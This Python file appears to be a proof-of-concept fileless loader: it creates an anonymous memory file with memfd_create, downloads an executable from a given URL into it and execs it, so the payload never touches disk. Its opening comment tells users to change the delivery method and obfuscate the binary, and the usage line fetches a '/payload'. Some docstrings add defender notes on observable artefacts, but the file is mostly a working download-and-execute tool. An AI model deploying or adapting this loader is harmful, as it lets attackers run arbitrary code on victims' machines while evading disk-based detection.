#!/usr/bin/python
# Andres Doreste
# Just a PoC! won't work on Kernels < 3.17
# Change the delivery method and don't forget obfuscate the binary (;
import ctypes
import os
import sys
# urlretrieve lives in urllib.request on Python 3 and in urllib on Python 2;
# bind whichever one matches the running interpreter.
if sys.version_info >= (3, 0):
    from urllib.request import urlretrieve
else:
    from urllib import urlretrieve
class MemDownExec:
    """PoC: download an executable into an anonymous memory file and exec it.

    Flow: memfd_create(2) yields a descriptor, the download is written to
    that descriptor through its /proc/<pid>/fd/<n> path, and os.execv() is
    then called on the same path. The payload is therefore never stored
    under a regular file path by this code.

    Defender notes: the observable artefacts of this pattern are the
    memfd_create syscall itself (auditable per syscall), an exec whose
    path is under /proc/<pid>/fd/, and afterwards a process whose
    /proc/<pid>/exe link points at a "memfd:" entry rather than a file on
    disk. The download is not authenticated or integrity-checked here.
    """

    def __init__(self):
        # CDLL(None) exposes the symbols already loaded into this process,
        # which is how the raw syscall() wrapper is reached.
        handle = ctypes.CDLL(None)
        self.libc = handle
        self.syscall = handle.syscall
        # Kept as a string because it is only used to build a /proc path.
        self.proc_number = str(os.getpid())

    def create_mem_file(self):
        """Create the anonymous memory file and return its /proc path.

        Returns:
            "/proc/<pid>/fd/<n>" where <n> is whatever the syscall returned.
        """
        # http://man7.org/linux/man-pages/man2/memfd_create.2.html
        # 319 is the memfd_create syscall number on x86_64; the empty string
        # is the file's name and 1 is MFD_CLOEXEC.
        syscall_number = 319
        flags = 1
        descriptor = self.syscall(syscall_number, "", flags)
        # NOTE(review): the return value is used unchecked, so a failed call
        # (-1) would still be turned into a path here.
        return os.path.join("/proc", self.proc_number, "fd", str(descriptor))

    def down_exec(self, file_url, mem_file_path, argv):
        """Fetch *file_url* into *mem_file_path*, then exec it with *argv*.

        os.execv() replaces the current process image, so on success this
        call does not return. The fetched content is executed as-is; nothing
        in this method verifies its origin or integrity.
        """
        target = mem_file_path
        urlretrieve(file_url, target)
        os.execv(target, argv)
if __name__ == "__main__":
    # Command line: <script> URL [ARGS...]; the URL is mandatory.
    script_name = sys.argv[0]
    if len(sys.argv) < 2:
        usage_lines = (
            "[+] Usage:",
            "[+] {} URL ARGS".format(script_name),
            "[>] {} http://127.0.0.1/payload".format(script_name),
        )
        for usage_line in usage_lines:
            print(usage_line)
        exit(1)

    url = sys.argv[1]
    # argv handed to the exec'd image: this script's own argv[0] followed by
    # everything after the URL. The resulting command line therefore names
    # this script, not the fetched binary.
    child_argv = sys.argv[0:1] + sys.argv[2::]

    mde = MemDownExec()
    mem_path = mde.create_mem_file()
    # Does not return on success: the process image is replaced.
    mde.down_exec(url, mem_path, child_argv)